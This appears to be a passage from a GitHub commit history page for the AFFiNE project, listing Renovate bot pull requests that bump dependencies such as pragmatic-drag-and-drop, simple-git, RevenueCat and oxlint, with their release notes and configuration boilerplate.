Commit Graph

11427 Commits

Author SHA1 Message Date
renovate[bot] c70eb811b9 chore: bump up @atlaskit/pragmatic-drag-and-drop-hitbox version to v2 (#15397)
This PR contains the following updates:

| Package | Change |
[Age](https://docs.renovatebot.com/merge-confidence/) |
[Confidence](https://docs.renovatebot.com/merge-confidence/) |
|---|---|---|---|
|
[@atlaskit/pragmatic-drag-and-drop-hitbox](https://atlassian.design/components/pragmatic-drag-and-drop/)
([source](https://redirect.github.com/atlassian/pragmatic-drag-and-drop))
| [`^1.1.0` →
`^2.0.0`](https://renovatebot.com/diffs/npm/@atlaskit%2fpragmatic-drag-and-drop-hitbox/1.1.0/2.0.0)
|
![age](https://developer.mend.io/api/mc/badges/age/npm/@atlaskit%2fpragmatic-drag-and-drop-hitbox/2.0.0?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@atlaskit%2fpragmatic-drag-and-drop-hitbox/1.1.0/2.0.0?slim=true)
|

---

### Release Notes

<details>
<summary>atlassian/pragmatic-drag-and-drop
(@&#8203;atlaskit/pragmatic-drag-and-drop-hitbox)</summary>

###
[`v1.2.0`](https://redirect.github.com/atlassian/pragmatic-drag-and-drop/compare/0b015bf95f062c374df21b24b944f2ed1c031ec2...fd32fa138eb149ad1256902c4c479281ea4dea89)

</details>

---

### Configuration

📅 **Schedule**: (UTC)

- Branch creation
  - At any time (no schedule defined)
- Automerge
  - At any time (no schedule defined)

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about this update
again.

---

- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box

---

This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/toeverything/AFFiNE).

<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0NC4zLjIiLCJ1cGRhdGVkSW5WZXIiOiI0NC4zLjIiLCJ0YXJnZXRCcmFuY2giOiJjYW5hcnkiLCJsYWJlbHMiOlsiZGVwZW5kZW5jaWVzIl19-->

Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
2026-08-01 15:17:47 +08:00
renovate[bot] f0fdc58010 chore: bump up @napi-rs/simple-git version to v1 (#15401)
This PR contains the following updates:

| Package | Change |
[Age](https://docs.renovatebot.com/merge-confidence/) |
[Confidence](https://docs.renovatebot.com/merge-confidence/) |
|---|---|---|---|
|
[@napi-rs/simple-git](https://redirect.github.com/Brooooooklyn/simple-git)
| [`^0.1.22` →
`^1.0.0`](https://renovatebot.com/diffs/npm/@napi-rs%2fsimple-git/0.1.22/1.1.0)
|
![age](https://developer.mend.io/api/mc/badges/age/npm/@napi-rs%2fsimple-git/1.1.0?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@napi-rs%2fsimple-git/0.1.22/1.1.0?slim=true)
|

---

### Release Notes

<details>
<summary>Brooooooklyn/simple-git (@&#8203;napi-rs/simple-git)</summary>

###
[`v1.1.0`](https://redirect.github.com/Brooooooklyn/simple-git/releases/tag/v1.1.0)

[Compare
Source](https://redirect.github.com/Brooooooklyn/simple-git/compare/v1.0.0...v1.1.0)

##### What's Changed

- feat: simple-git.napi.rs website (landing + docs + Cloudflare deploy)
by [@&#8203;Brooooooklyn](https://redirect.github.com/Brooooooklyn) in
[#&#8203;146](https://redirect.github.com/Brooooooklyn/simple-git/pull/146)
- fix(deps): update dependency
[@&#8203;void/md](https://redirect.github.com/void/md) to v0.10.5 by
[@&#8203;renovate](https://redirect.github.com/renovate)\[bot] in
[#&#8203;147](https://redirect.github.com/Brooooooklyn/simple-git/pull/147)
- fix(deps): update dependency
[@&#8203;void/react](https://redirect.github.com/void/react) to v0.10.5
by [@&#8203;renovate](https://redirect.github.com/renovate)\[bot] in
[#&#8203;148](https://redirect.github.com/Brooooooklyn/simple-git/pull/148)
- fix(deps): update dependency void to v0.10.5 by
[@&#8203;renovate](https://redirect.github.com/renovate)\[bot] in
[#&#8203;151](https://redirect.github.com/Brooooooklyn/simple-git/pull/151)
- chore(deps): update dorny/paths-filter action to v4 by
[@&#8203;renovate](https://redirect.github.com/renovate)\[bot] in
[#&#8203;150](https://redirect.github.com/Brooooooklyn/simple-git/pull/150)
- feat: add `created` (first-add commit) to FileModification by
[@&#8203;Brooooooklyn](https://redirect.github.com/Brooooooklyn) in
[#&#8203;152](https://redirect.github.com/Brooooooklyn/simple-git/pull/152)
- fix(deps): update void to v0.10.6 by
[@&#8203;renovate](https://redirect.github.com/renovate)\[bot] in
[#&#8203;153](https://redirect.github.com/Brooooooklyn/simple-git/pull/153)

**Full Changelog**:
<https://github.com/Brooooooklyn/simple-git/compare/v1.0.0...v1.1.0>

###
[`v1.0.0`](https://redirect.github.com/Brooooooklyn/simple-git/releases/tag/v1.0.0)

[Compare
Source](https://redirect.github.com/Brooooooklyn/simple-git/compare/v0.1.22...v1.0.0)

##### What's Changed

- feat: implement Repository.getFileCreatedDate method with async
support by
[@&#8203;Brooooooklyn](https://redirect.github.com/Brooooooklyn) with
[@&#8203;Copilot](https://redirect.github.com/Copilot) in
[#&#8203;100](https://redirect.github.com/Brooooooklyn/simple-git/pull/100)
- chore(deps): update yarn to v4.9.3 by
[@&#8203;renovate](https://redirect.github.com/renovate)\[bot] in
[#&#8203;101](https://redirect.github.com/Brooooooklyn/simple-git/pull/101)
- chore(deps): update yarn to v4.9.4 by
[@&#8203;renovate](https://redirect.github.com/renovate)\[bot] in
[#&#8203;102](https://redirect.github.com/Brooooooklyn/simple-git/pull/102)
- chore(deps): update actions/setup-node action to v5 by
[@&#8203;renovate](https://redirect.github.com/renovate)\[bot] in
[#&#8203;103](https://redirect.github.com/Brooooooklyn/simple-git/pull/103)
- chore(deps): update yarn to v4.10.1 by
[@&#8203;renovate](https://redirect.github.com/renovate)\[bot] in
[#&#8203;104](https://redirect.github.com/Brooooooklyn/simple-git/pull/104)
- chore(deps): update yarn to v4.10.2 by
[@&#8203;renovate](https://redirect.github.com/renovate)\[bot] in
[#&#8203;105](https://redirect.github.com/Brooooooklyn/simple-git/pull/105)
- chore(deps): update yarn to v4.10.3 by
[@&#8203;renovate](https://redirect.github.com/renovate)\[bot] in
[#&#8203;106](https://redirect.github.com/Brooooooklyn/simple-git/pull/106)
- chore(deps): update actions/setup-node action to v6 by
[@&#8203;renovate](https://redirect.github.com/renovate)\[bot] in
[#&#8203;108](https://redirect.github.com/Brooooooklyn/simple-git/pull/108)
- chore(deps): lock file maintenance by
[@&#8203;renovate](https://redirect.github.com/renovate)\[bot] in
[#&#8203;107](https://redirect.github.com/Brooooooklyn/simple-git/pull/107)
- chore(deps): update github artifact actions (major) by
[@&#8203;renovate](https://redirect.github.com/renovate)\[bot] in
[#&#8203;109](https://redirect.github.com/Brooooooklyn/simple-git/pull/109)
- chore(deps): update dependency node to v24 by
[@&#8203;renovate](https://redirect.github.com/renovate)\[bot] in
[#&#8203;110](https://redirect.github.com/Brooooooklyn/simple-git/pull/110)
- chore(deps): update cross-platform-actions/action action to v0.30.0 by
[@&#8203;renovate](https://redirect.github.com/renovate)\[bot] in
[#&#8203;112](https://redirect.github.com/Brooooooklyn/simple-git/pull/112)
- chore(deps): update yarn to v4.11.0 by
[@&#8203;renovate](https://redirect.github.com/renovate)\[bot] in
[#&#8203;113](https://redirect.github.com/Brooooooklyn/simple-git/pull/113)
- chore(deps): update yarn to v4.12.0 by
[@&#8203;renovate](https://redirect.github.com/renovate)\[bot] in
[#&#8203;115](https://redirect.github.com/Brooooooklyn/simple-git/pull/115)
- chore(deps): update actions/checkout action to v6 by
[@&#8203;renovate](https://redirect.github.com/renovate)\[bot] in
[#&#8203;114](https://redirect.github.com/Brooooooklyn/simple-git/pull/114)
- chore(deps): lock file maintenance by
[@&#8203;renovate](https://redirect.github.com/renovate)\[bot] in
[#&#8203;111](https://redirect.github.com/Brooooooklyn/simple-git/pull/111)
- chore(deps): update actions/cache action to v5 by
[@&#8203;renovate](https://redirect.github.com/renovate)\[bot] in
[#&#8203;116](https://redirect.github.com/Brooooooklyn/simple-git/pull/116)
- chore(deps): update github artifact actions (major) by
[@&#8203;renovate](https://redirect.github.com/renovate)\[bot] in
[#&#8203;117](https://redirect.github.com/Brooooooklyn/simple-git/pull/117)
- chore(deps): update cross-platform-actions/action action to v0.31.0 by
[@&#8203;renovate](https://redirect.github.com/renovate)\[bot] in
[#&#8203;118](https://redirect.github.com/Brooooooklyn/simple-git/pull/118)
- chore(deps): update cross-platform-actions/action action to v0.32.0 by
[@&#8203;renovate](https://redirect.github.com/renovate)\[bot] in
[#&#8203;119](https://redirect.github.com/Brooooooklyn/simple-git/pull/119)
- chore(deps): lock file maintenance by
[@&#8203;renovate](https://redirect.github.com/renovate)\[bot] in
[#&#8203;120](https://redirect.github.com/Brooooooklyn/simple-git/pull/120)
- chore(deps): update dependency ava to v7 by
[@&#8203;renovate](https://redirect.github.com/renovate)\[bot] in
[#&#8203;122](https://redirect.github.com/Brooooooklyn/simple-git/pull/122)
- chore(deps): update github artifact actions (major) by
[@&#8203;renovate](https://redirect.github.com/renovate)\[bot] in
[#&#8203;121](https://redirect.github.com/Brooooooklyn/simple-git/pull/121)
- chore(deps): lock file maintenance by
[@&#8203;renovate](https://redirect.github.com/renovate)\[bot] in
[#&#8203;123](https://redirect.github.com/Brooooooklyn/simple-git/pull/123)
- chore(deps): update yarn to v4.13.0 by
[@&#8203;renovate](https://redirect.github.com/renovate)\[bot] in
[#&#8203;124](https://redirect.github.com/Brooooooklyn/simple-git/pull/124)
- chore(deps): lock file maintenance by
[@&#8203;renovate](https://redirect.github.com/renovate)\[bot] in
[#&#8203;125](https://redirect.github.com/Brooooooklyn/simple-git/pull/125)
- chore(deps): update cross-platform-actions/action action to v1 by
[@&#8203;renovate](https://redirect.github.com/renovate)\[bot] in
[#&#8203;126](https://redirect.github.com/Brooooooklyn/simple-git/pull/126)
- chore(deps): update yarn to v4.14.0 by
[@&#8203;renovate](https://redirect.github.com/renovate)\[bot] in
[#&#8203;127](https://redirect.github.com/Brooooooklyn/simple-git/pull/127)
- chore(deps): update yarn to v4.14.1 by
[@&#8203;renovate](https://redirect.github.com/renovate)\[bot] in
[#&#8203;128](https://redirect.github.com/Brooooooklyn/simple-git/pull/128)
- chore(deps): lock file maintenance by
[@&#8203;renovate](https://redirect.github.com/renovate)\[bot] in
[#&#8203;130](https://redirect.github.com/Brooooooklyn/simple-git/pull/130)
- chore(deps): update dependency ava to v8 by
[@&#8203;renovate](https://redirect.github.com/renovate)\[bot] in
[#&#8203;129](https://redirect.github.com/Brooooooklyn/simple-git/pull/129)
- chore(deps): update cross-platform-actions/action action to v1.1.0 by
[@&#8203;renovate](https://redirect.github.com/renovate)\[bot] in
[#&#8203;131](https://redirect.github.com/Brooooooklyn/simple-git/pull/131)
- fix(deps): update rust crate git2 to 0.21 by
[@&#8203;renovate](https://redirect.github.com/renovate)\[bot] in
[#&#8203;132](https://redirect.github.com/Brooooooklyn/simple-git/pull/132)
- chore(deps): update yarn to v4.15.0 by
[@&#8203;renovate](https://redirect.github.com/renovate)\[bot] in
[#&#8203;133](https://redirect.github.com/Brooooooklyn/simple-git/pull/133)
- chore(deps): update cross-platform-actions/action action to v1.2.0 by
[@&#8203;renovate](https://redirect.github.com/renovate)\[bot] in
[#&#8203;134](https://redirect.github.com/Brooooooklyn/simple-git/pull/134)
- chore(deps): update yarn to v4.16.0 by
[@&#8203;renovate](https://redirect.github.com/renovate)\[bot] in
[#&#8203;135](https://redirect.github.com/Brooooooklyn/simple-git/pull/135)
- chore(deps): update yarn monorepo to v4.17.0 by
[@&#8203;renovate](https://redirect.github.com/renovate)\[bot] in
[#&#8203;136](https://redirect.github.com/Brooooooklyn/simple-git/pull/136)
- chore(deps): update cross-platform-actions/action action to v1.3.0 by
[@&#8203;renovate](https://redirect.github.com/renovate)\[bot] in
[#&#8203;138](https://redirect.github.com/Brooooooklyn/simple-git/pull/138)
- fix: adapt to git2 0.21 string accessor API changes by
[@&#8203;Brooooooklyn](https://redirect.github.com/Brooooooklyn) in
[#&#8203;140](https://redirect.github.com/Brooooooklyn/simple-git/pull/140)
- chore(deps): update actions/cache action to v6 by
[@&#8203;renovate](https://redirect.github.com/renovate)\[bot] in
[#&#8203;139](https://redirect.github.com/Brooooooklyn/simple-git/pull/139)
- chore(deps): update actions/checkout action to v7 by
[@&#8203;renovate](https://redirect.github.com/renovate)\[bot] in
[#&#8203;137](https://redirect.github.com/Brooooooklyn/simple-git/pull/137)
- feat: file modification metadata (author + bulk) by
[@&#8203;Brooooooklyn](https://redirect.github.com/Brooooooklyn) in
[#&#8203;141](https://redirect.github.com/Brooooooklyn/simple-git/pull/141)
- feat: git feature suite (status, config, push, index/commit, blame,
branch/checkout) by
[@&#8203;Brooooooklyn](https://redirect.github.com/Brooooooklyn) in
[#&#8203;142](https://redirect.github.com/Brooooooklyn/simple-git/pull/142)
- chore(deps): lock file maintenance by
[@&#8203;renovate](https://redirect.github.com/renovate)\[bot] in
[#&#8203;144](https://redirect.github.com/Brooooooklyn/simple-git/pull/144)
- feat!: API 1.0 breaking sweep (number bitflags, Date times, async I/O,
fixes) by
[@&#8203;Brooooooklyn](https://redirect.github.com/Brooooooklyn) in
[#&#8203;143](https://redirect.github.com/Brooooooklyn/simple-git/pull/143)

**Full Changelog**:
<https://github.com/Brooooooklyn/simple-git/compare/v0.1.22...v1.0.0>

</details>

---

### Configuration

📅 **Schedule**: (UTC)

- Branch creation
  - At any time (no schedule defined)
- Automerge
  - At any time (no schedule defined)

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about this update
again.

---

- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box

---

This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/toeverything/AFFiNE).

<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0NC4zLjIiLCJ1cGRhdGVkSW5WZXIiOiI0NC4zLjIiLCJ0YXJnZXRCcmFuY2giOiJjYW5hcnkiLCJsYWJlbHMiOlsiZGVwZW5kZW5jaWVzIl19-->

Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
2026-08-01 15:14:39 +08:00
renovate[bot] e8fefc82c1 chore: bump up @atlaskit/pragmatic-drag-and-drop version to v2 (#15394)
This PR contains the following updates:

| Package | Change |
[Age](https://docs.renovatebot.com/merge-confidence/) |
[Confidence](https://docs.renovatebot.com/merge-confidence/) |
|---|---|---|---|
|
[@atlaskit/pragmatic-drag-and-drop](https://atlassian.design/components/pragmatic-drag-and-drop/)
([source](https://redirect.github.com/atlassian/pragmatic-drag-and-drop))
| [`^1.7.7` →
`^2.0.0`](https://renovatebot.com/diffs/npm/@atlaskit%2fpragmatic-drag-and-drop/1.8.1/2.0.1)
|
![age](https://developer.mend.io/api/mc/badges/age/npm/@atlaskit%2fpragmatic-drag-and-drop/2.0.1?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@atlaskit%2fpragmatic-drag-and-drop/1.8.1/2.0.1?slim=true)
|

---

### Configuration

📅 **Schedule**: (UTC)

- Branch creation
  - At any time (no schedule defined)
- Automerge
  - At any time (no schedule defined)

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about this update
again.

---

- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box

---

This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/toeverything/AFFiNE).

<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0NC4zLjIiLCJ1cGRhdGVkSW5WZXIiOiI0NC4zLjIiLCJ0YXJnZXRCcmFuY2giOiJjYW5hcnkiLCJsYWJlbHMiOlsiZGVwZW5kZW5jaWVzIl19-->

Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
2026-07-31 19:06:55 +08:00
renovate[bot] 3824018d2d chore: bump up RevenueCat/purchases-ios-spm version to from: "5.83.0" (#15393)
This PR contains the following updates:

| Package | Update | Change |
|---|---|---|
|
[RevenueCat/purchases-ios-spm](https://redirect.github.com/RevenueCat/purchases-ios-spm)
| minor | `from: "5.82.0"` → `from: "5.83.0"` |

---

### Release Notes

<details>
<summary>RevenueCat/purchases-ios-spm
(RevenueCat/purchases-ios-spm)</summary>

###
[`v5.83.0`](https://redirect.github.com/RevenueCat/purchases-ios-spm/compare/5.82.0...5.83.0)

[Compare
Source](https://redirect.github.com/RevenueCat/purchases-ios-spm/compare/5.82.0...5.83.0)

</details>

---

### Configuration

📅 **Schedule**: (UTC)

- Branch creation
  - At any time (no schedule defined)
- Automerge
  - At any time (no schedule defined)

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about this update
again.

---

- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box

---

This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/toeverything/AFFiNE).

<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0NC4zLjIiLCJ1cGRhdGVkSW5WZXIiOiI0NC4zLjIiLCJ0YXJnZXRCcmFuY2giOiJjYW5hcnkiLCJsYWJlbHMiOlsiZGVwZW5kZW5jaWVzIl19-->

Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
2026-07-31 19:05:31 +08:00
renovate[bot] ea7df7f428 chore: bump up RevenueCat/purchases-ios-spm version to from: "5.82.0" (#15388)
This PR contains the following updates:

| Package | Update | Change |
|---|---|---|
|
[RevenueCat/purchases-ios-spm](https://redirect.github.com/RevenueCat/purchases-ios-spm)
| minor | `from: "5.76.0"` → `from: "5.82.0"` |

---

### Release Notes

<details>
<summary>RevenueCat/purchases-ios-spm
(RevenueCat/purchases-ios-spm)</summary>

###
[`v5.82.0`](https://redirect.github.com/RevenueCat/purchases-ios-spm/compare/5.81.3...5.82.0)

[Compare
Source](https://redirect.github.com/RevenueCat/purchases-ios-spm/compare/5.81.3...5.82.0)

###
[`v5.81.3`](https://redirect.github.com/RevenueCat/purchases-ios-spm/compare/5.81.2...5.81.3)

[Compare
Source](https://redirect.github.com/RevenueCat/purchases-ios-spm/compare/5.81.2...5.81.3)

###
[`v5.81.2`](https://redirect.github.com/RevenueCat/purchases-ios-spm/compare/5.81.1...5.81.2)

[Compare
Source](https://redirect.github.com/RevenueCat/purchases-ios-spm/compare/5.81.1...5.81.2)

###
[`v5.81.1`](https://redirect.github.com/RevenueCat/purchases-ios-spm/compare/5.81.0...5.81.1)

[Compare
Source](https://redirect.github.com/RevenueCat/purchases-ios-spm/compare/5.81.0...5.81.1)

###
[`v5.81.0`](https://redirect.github.com/RevenueCat/purchases-ios-spm/compare/5.80.3...5.81.0)

[Compare
Source](https://redirect.github.com/RevenueCat/purchases-ios-spm/compare/5.80.3...5.81.0)

###
[`v5.80.3`](https://redirect.github.com/RevenueCat/purchases-ios-spm/compare/5.80.2...5.80.3)

[Compare
Source](https://redirect.github.com/RevenueCat/purchases-ios-spm/compare/5.80.2...5.80.3)

###
[`v5.80.2`](https://redirect.github.com/RevenueCat/purchases-ios-spm/compare/5.80.1...5.80.2)

[Compare
Source](https://redirect.github.com/RevenueCat/purchases-ios-spm/compare/5.80.1...5.80.2)

###
[`v5.80.1`](https://redirect.github.com/RevenueCat/purchases-ios-spm/compare/5.80.0...5.80.1)

[Compare
Source](https://redirect.github.com/RevenueCat/purchases-ios-spm/compare/5.80.0...5.80.1)

###
[`v5.80.0`](https://redirect.github.com/RevenueCat/purchases-ios-spm/compare/5.79.0...5.80.0)

[Compare
Source](https://redirect.github.com/RevenueCat/purchases-ios-spm/compare/5.79.0...5.80.0)

###
[`v5.79.0`](https://redirect.github.com/RevenueCat/purchases-ios-spm/compare/5.78.0...5.79.0)

[Compare
Source](https://redirect.github.com/RevenueCat/purchases-ios-spm/compare/5.78.0...5.79.0)

###
[`v5.78.0`](https://redirect.github.com/RevenueCat/purchases-ios-spm/compare/5.77.0...5.78.0)

[Compare
Source](https://redirect.github.com/RevenueCat/purchases-ios-spm/compare/5.77.0...5.78.0)

###
[`v5.77.0`](https://redirect.github.com/RevenueCat/purchases-ios-spm/compare/5.76.0...5.77.0)

[Compare
Source](https://redirect.github.com/RevenueCat/purchases-ios-spm/compare/5.76.0...5.77.0)

</details>

---

### Configuration

📅 **Schedule**: (UTC)

- Branch creation
  - At any time (no schedule defined)
- Automerge
  - At any time (no schedule defined)

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about this update
again.

---

- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box

---

This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/toeverything/AFFiNE).

<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0NC4zLjIiLCJ1cGRhdGVkSW5WZXIiOiI0NC4zLjIiLCJ0YXJnZXRCcmFuY2giOiJjYW5hcnkiLCJsYWJlbHMiOlsiZGVwZW5kZW5jaWVzIl19-->

Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
v2026.7.31-canary.955
2026-07-31 17:09:12 +08:00
renovate[bot] d124d6eaca chore: bump up oxlint version to v1.76.0 (#15387)
This PR contains the following updates:

| Package | Change |
[Age](https://docs.renovatebot.com/merge-confidence/) |
[Confidence](https://docs.renovatebot.com/merge-confidence/) |
|---|---|---|---|
| [oxlint](https://oxc.rs/docs/guide/usage/linter)
([source](https://redirect.github.com/oxc-project/oxc/tree/HEAD/npm/oxlint))
| [`1.68.0` →
`1.76.0`](https://renovatebot.com/diffs/npm/oxlint/1.68.0/1.76.0) |
![age](https://developer.mend.io/api/mc/badges/age/npm/oxlint/1.76.0?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/oxlint/1.68.0/1.76.0?slim=true)
|

---

### Release Notes

<details>
<summary>oxc-project/oxc (oxlint)</summary>

###
[`v1.76.0`](https://redirect.github.com/oxc-project/oxc/blob/HEAD/npm/oxlint/CHANGELOG.md#1760---2026-07-27)

[Compare
Source](https://redirect.github.com/oxc-project/oxc/compare/oxlint_v1.75.0...oxlint_v1.76.0)

##### 🚀 Features

-
[`8d31dfa`](https://redirect.github.com/oxc-project/oxc/commit/8d31dfa)
linter: Verify eslint/no-restricted-globals config schema
([#&#8203;24598](https://redirect.github.com/oxc-project/oxc/issues/24598))
(vigneshwar)
-
[`7069621`](https://redirect.github.com/oxc-project/oxc/commit/7069621)
linter: Verify jest/vitest prefer-lowercase-title config schema
([#&#8203;24724](https://redirect.github.com/oxc-project/oxc/issues/24724))
(Bartok)
-
[`016cf2a`](https://redirect.github.com/oxc-project/oxc/commit/016cf2a)
linter/oxc: Add bad-match-all-arg rule
([#&#8203;24900](https://redirect.github.com/oxc-project/oxc/issues/24900))
(camc314)
-
[`cdc941e`](https://redirect.github.com/oxc-project/oxc/commit/cdc941e)
linter/n: Implement `exports-style` rule
([#&#8203;24087](https://redirect.github.com/oxc-project/oxc/issues/24087))
(Mikhail Baev)
-
[`1ad6f6c`](https://redirect.github.com/oxc-project/oxc/commit/1ad6f6c)
linter/eslint: Implement `id-denylist` rule
([#&#8203;24632](https://redirect.github.com/oxc-project/oxc/issues/24632))
(Mikhail Baev)

##### 📚 Documentation

-
[`3ff2e0e`](https://redirect.github.com/oxc-project/oxc/commit/3ff2e0e)
linter: Clarify config extends types
([#&#8203;24936](https://redirect.github.com/oxc-project/oxc/issues/24936))
(Boshen)

###
[`v1.75.0`](https://redirect.github.com/oxc-project/oxc/blob/HEAD/npm/oxlint/CHANGELOG.md#1750---2026-07-20)

[Compare
Source](https://redirect.github.com/oxc-project/oxc/compare/oxlint_v1.74.0...oxlint_v1.75.0)

##### 🚀 Features

-
[`dd18383`](https://redirect.github.com/oxc-project/oxc/commit/dd18383)
linter/node: Implement no-top-level-await rule
([#&#8203;24634](https://redirect.github.com/oxc-project/oxc/issues/24634))
(Connor Shea)
-
[`16a65f2`](https://redirect.github.com/oxc-project/oxc/commit/16a65f2)
linter/react: Implement function-component-definition rule
([#&#8203;24471](https://redirect.github.com/oxc-project/oxc/issues/24471))
(Cole Ellison)
-
[`7f1f585`](https://redirect.github.com/oxc-project/oxc/commit/7f1f585)
linter: Reuse `jest/padding-around-test-blocks` for
`vitest/padding-around-test-blocks`
([#&#8203;24519](https://redirect.github.com/oxc-project/oxc/issues/24519))
(Mikhail Baev)
-
[`99978a8`](https://redirect.github.com/oxc-project/oxc/commit/99978a8)
linter/import/consistent-type-specifier-style: Support
`prefer-top-level-if-only-type-imports` option
([#&#8203;24502](https://redirect.github.com/oxc-project/oxc/issues/24502))
(camc314)

##### 🐛 Bug Fixes

-
[`8694167`](https://redirect.github.com/oxc-project/oxc/commit/8694167)
linter/eslint/prefer-destructuring: Handle typed declarations
([#&#8203;24616](https://redirect.github.com/oxc-project/oxc/issues/24616))
(camc314)

###
[`v1.74.0`](https://redirect.github.com/oxc-project/oxc/blob/HEAD/npm/oxlint/CHANGELOG.md#1740---2026-07-13)

[Compare
Source](https://redirect.github.com/oxc-project/oxc/compare/oxlint_v1.73.0...oxlint_v1.74.0)

##### 🚀 Features

-
[`0433a83`](https://redirect.github.com/oxc-project/oxc/commit/0433a83)
linter/eslint/no-inner-declarations: Add `namespaces` option
([#&#8203;24044](https://redirect.github.com/oxc-project/oxc/issues/24044))
(Boshen)

##### 🐛 Bug Fixes

-
[`8337835`](https://redirect.github.com/oxc-project/oxc/commit/8337835)
linter: Error on `ignorePatterns` that cannot match files aoutside the
config directory
([#&#8203;24341](https://redirect.github.com/oxc-project/oxc/issues/24341))
(leaysgur)
-
[`2ce5a33`](https://redirect.github.com/oxc-project/oxc/commit/2ce5a33)
linter: Resolve `ignorePatterns` relative to the config dir
([#&#8203;24339](https://redirect.github.com/oxc-project/oxc/issues/24339))
(leaysgur)

#####  Performance

-
[`7f80cac`](https://redirect.github.com/oxc-project/oxc/commit/7f80cac)
linter/vue/prop-name-casing: Precompile `ignoreProps` regex pattern
([#&#8203;24413](https://redirect.github.com/oxc-project/oxc/issues/24413))
(connorshea)
-
[`6272051`](https://redirect.github.com/oxc-project/oxc/commit/6272051)
linter/typescript/no-require-imports: Compile allow patterns once
([#&#8203;24417](https://redirect.github.com/oxc-project/oxc/issues/24417))
(connorshea)
-
[`33805b9`](https://redirect.github.com/oxc-project/oxc/commit/33805b9)
linter/jsdoc/require-param: Compile checkTypesPattern regex once
([#&#8203;24420](https://redirect.github.com/oxc-project/oxc/issues/24420))
(connorshea)

###
[`v1.73.0`](https://redirect.github.com/oxc-project/oxc/blob/HEAD/npm/oxlint/CHANGELOG.md#1730---2026-07-06)

[Compare
Source](https://redirect.github.com/oxc-project/oxc/compare/oxlint_v1.72.0...oxlint_v1.73.0)

##### 🚀 Features

-
[`a2c97f3`](https://redirect.github.com/oxc-project/oxc/commit/a2c97f3)
linter/unicorn: Implement `explicit-timer-delay` rule
([#&#8203;23612](https://redirect.github.com/oxc-project/oxc/issues/23612))
(Mikhail Baev)
-
[`85735cb`](https://redirect.github.com/oxc-project/oxc/commit/85735cb)
linter/unicorn: Implement `no-confusing-array-with` rule
([#&#8203;23638](https://redirect.github.com/oxc-project/oxc/issues/23638))
(Shekhu☺️)
-
[`cb4fbb9`](https://redirect.github.com/oxc-project/oxc/commit/cb4fbb9)
linter/eslint: Implement no-unreachable-loop rule
([#&#8203;23975](https://redirect.github.com/oxc-project/oxc/issues/23975))
(Todor Andonov)
-
[`dc32112`](https://redirect.github.com/oxc-project/oxc/commit/dc32112)
linter/eslint/no-constant-binary-expression: Check relational
comparisons
([#&#8203;24088](https://redirect.github.com/oxc-project/oxc/issues/24088))
(camc314)
-
[`d963967`](https://redirect.github.com/oxc-project/oxc/commit/d963967)
linter/unicorn/no-array-sort: Add `allowAfterSpread` option
([#&#8203;24043](https://redirect.github.com/oxc-project/oxc/issues/24043))
(Boshen)
-
[`0a75682`](https://redirect.github.com/oxc-project/oxc/commit/0a75682)
linter: Add per-rule timings for type-aware linting
([#&#8203;22488](https://redirect.github.com/oxc-project/oxc/issues/22488))
(camchenry)
-
[`743e222`](https://redirect.github.com/oxc-project/oxc/commit/743e222)
linter/react: Add `disallowedValues` option for `forbid-dom-props` rule
([#&#8203;23970](https://redirect.github.com/oxc-project/oxc/issues/23970))
(Mikhail Baev)

##### 🐛 Bug Fixes

-
[`bdb51c7`](https://redirect.github.com/oxc-project/oxc/commit/bdb51c7)
linter/jest/prefer-ending-with-an-expect: Validate config patterns
([#&#8203;24122](https://redirect.github.com/oxc-project/oxc/issues/24122))
(camc314)
-
[`45d607d`](https://redirect.github.com/oxc-project/oxc/commit/45d607d)
linter/react/forbid-component-props: Make allow/disallow lists optional
in schema
([#&#8203;24024](https://redirect.github.com/oxc-project/oxc/issues/24024))
(Boshen)

###
[`v1.72.0`](https://redirect.github.com/oxc-project/oxc/blob/HEAD/npm/oxlint/CHANGELOG.md#1720---2026-06-29)

[Compare
